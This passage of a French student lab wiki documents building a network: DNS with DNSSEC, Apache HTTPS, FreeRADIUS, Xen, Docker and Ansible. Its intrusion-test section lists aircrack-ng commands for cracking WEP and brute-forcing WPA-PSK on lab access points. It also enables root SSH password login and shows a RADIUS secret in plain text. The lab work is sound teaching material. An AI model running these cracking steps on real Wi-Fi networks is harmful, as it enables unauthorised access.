 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier '''etc/ssh/sshd_config''' de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier '''/etc/bind/named.conf.options''' la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps: &lt;br /&gt;
 root@mycoplasma:/ apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut modifier les fichiers de configuration: &lt;br /&gt;
* clients.conf &lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0 # vi clients.conf &lt;br /&gt;
  client 10.60.200.2/24 {&lt;br /&gt;
   secret = secretIMA5SC&lt;br /&gt;
   shortname = borneMycoplasma&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
  client PA {&lt;br /&gt;
   ipaddr = 10.60.201.5&lt;br /&gt;
   secret = secretIMA5SC&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
* users &lt;br /&gt;
Il faut ajouter une ligne qui indique l'identifiant et le mot de passe. On a choisi les mêmes id que la VM : root et mot de passe habituel.&lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0# vim users&lt;br /&gt;
&lt;br /&gt;
 user Cleartext-Password := &amp;quot;&amp;lt;password&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Enregistrer les modifications et relancer :&lt;br /&gt;
 service freeradius stop&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible. Nous avons préparé le palybook suivant pour le déploiement de notre ferme de serveurs.&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# cat deploy-site.yaml''' &lt;br /&gt;
 ---&lt;br /&gt;
 - hosts: webservers&lt;br /&gt;
   tasks: &lt;br /&gt;
    - name: 1. Copying Website files&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/index.html&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/index.html&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 2. Copying Dockerfile&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/Dockerfile&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/Dockerfile&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 3. Install pip&lt;br /&gt;
      apt: name=python-pip state=present&lt;br /&gt;
    - name: 4. install docker package&lt;br /&gt;
      pip: name=docker&lt;br /&gt;
    - name: 5. Stop container if running&lt;br /&gt;
      docker_container:&lt;br /&gt;
       name: mycoplasmacontainer&lt;br /&gt;
       state: stopped&lt;br /&gt;
    - name: 6. delete image&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        force: yes&lt;br /&gt;
        state: absent&lt;br /&gt;
    - name: 7. Build Docker image from Dockerfile&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        path: &amp;quot;/tmp/docker/mycoplasma/&amp;quot;&lt;br /&gt;
        state: build&lt;br /&gt;
    - name: 8. Running the container&lt;br /&gt;
      docker_container:&lt;br /&gt;
        image: mycoplasma:latest&lt;br /&gt;
        state: started&lt;br /&gt;
        recreate: yes&lt;br /&gt;
        name: mycoplasmacontainer&lt;br /&gt;
        ports: &amp;quot;8002:80&amp;quot;&lt;br /&gt;
    - name: 9. Check if container is running&lt;br /&gt;
      shell: docker ps&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# ansible-playbook deploy-site.yaml'''&lt;br /&gt;
&lt;br /&gt;
[[Fichier:load_balancers.png]]&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
